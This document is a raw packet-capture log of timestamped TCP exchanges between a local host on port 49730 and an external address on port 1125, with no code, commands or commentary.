Oct 11, 2024 16:53:47.131470919 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.131503105 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.131515980 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.131534100 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.131578922 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.131617069 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.179934025 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.237252951 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.237365961 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.237399101 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.237447023 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.237452984 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.237495899 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.237521887 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.237546921 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.237596035 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.237601042 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.237646103 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.237678051 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.237693071 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.237711906 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.237745047 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.237759113 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.237795115 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.237844944 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.237879038 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.237929106 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.237961054 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.237972975 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.237996101 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.238029003 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.238040924 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.238064051 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.238096952 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.238111973 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.238133907 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.238167048 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.238188028 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.238199949 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.238233089 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.238248110 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.238266945 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.238298893 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.238315105 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.238332033 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.238364935 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.238385916 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.238702059 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.238734007 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.238751888 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.238770008 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.238815069 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.238847971 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.238879919 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.238926888 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.238960028 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.239010096 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.239042044 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.239057064 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.239073992 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.239106894 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.239130020 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.239157915 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.239191055 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.239203930 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.239244938 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.239278078 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.239284039 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.239329100 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.239362001 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.239381075 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.239434004 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.239480972 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.239483118 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.239512920 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.239545107 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.239562988 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.239578009 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.239605904 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.239623070 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.239639997 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.239676952 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.239707947 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.239712000 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.239742994 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.239761114 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.239774942 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.239818096 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.239823103 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.239867926 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.239900112 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.239916086 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.239953041 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.240020037 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.240051031 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.240084887 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.240118027 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.240139008 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.240149975 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.240183115 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.240204096 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.240217924 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.240250111 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.240272999 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.240350962 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.240400076 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.240403891 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.240452051 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.240484953 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.240506887 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.240534067 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.240566969 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.240588903 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.240614891 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.240648031 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.240668058 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.240679979 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.240712881 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.240731001 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.240745068 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.240777969 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.240796089 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.240809917 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.240842104 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.240863085 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.240874052 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.240906000 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.240925074 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.240937948 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.240971088 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.240988970 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.241003990 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.241035938 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.241055965 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.241085052 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.241134882 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.241147995 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.241180897 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.241214037 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.241233110 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.241245985 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.241277933 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.241297007 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.241311073 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.241342068 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.241364002 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.241374016 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.241405964 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.241426945 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.241439104 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.241471052 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.241492033 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.241504908 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.241535902 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.241553068 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.241570950 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.241601944 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.241619110 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.241636038 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.241667032 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.241686106 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.241699934 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.241730928 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.241749048 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.241763115 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.241795063 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.241813898 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.241826057 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.241857052 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.241875887 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.241889954 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.241921902 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.241941929 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.241954088 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.241986990 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.242007017 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.289309025 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.327107906 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.327167034 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.327214956 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.327264071 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.327299118 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.327331066 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.327339888 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.327452898 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.327491999 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.327496052 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.327524900 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.327558994 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.327569962 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.327610970 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.327642918 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.327656031 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.327699900 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.327730894 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.327733994 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.327766895 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.327800035 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.327810049 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.327833891 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.327867031 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.327877045 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.327898979 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.327930927 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.327938080 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.328030109 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.328069925 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.328103065 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.328105927 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.328136921 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.328145981 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.328170061 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.328202009 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.328208923 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.328237057 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.328278065 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.328322887 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.328356028 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.328389883 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.328397036 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.329307079 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.329359055 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.329407930 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.329444885 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.329504013 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.329525948 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.329559088 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.329591036 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.329596996 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.329624891 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.329673052 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.329675913 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.329709053 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.329751015 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.329758883 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.329791069 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.329830885 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.329839945 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.329889059 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.329921007 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.329971075 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.330003977 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.330034018 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.330049038 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.330049038 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.330066919 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.330079079 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.330117941 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.330151081 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.330159903 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.330183983 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.330219030 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.330229044 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.330269098 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.330302000 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.330312014 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.330336094 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.330368042 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.330374002 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.330420017 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.330465078 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.330495119 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.330523968 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.330570936 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.330574989 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.330609083 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.330641031 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.330656052 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.330674887 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.330720901 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.330733061 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.330768108 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.330800056 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.330818892 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.330832958 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.330864906 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.330876112 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.330898046 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.330930948 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.330941916 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.330965042 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.330997944 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.331007004 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.331029892 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.331062078 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.331064939 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.331159115 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.331197977 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.331211090 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.331243038 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.331285954 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.331293106 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.331326008 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.331363916 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.331377029 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.331432104 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.331464052 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.331495047 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.331496954 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.331597090 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.331613064 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.331646919 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.331681967 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.331691027 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.331715107 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.331754923 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.331808090 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.331841946 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.331875086 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.331887007 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.331907988 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.331940889 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.331950903 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.331974983 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.332007885 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.332012892 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.332040071 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.332072973 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.332082987 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.332107067 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.332139015 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.332149029 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.332171917 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.332204103 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.332212925 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.332238913 CEST	1125	49730	146.70.24.213	192.168.2.4
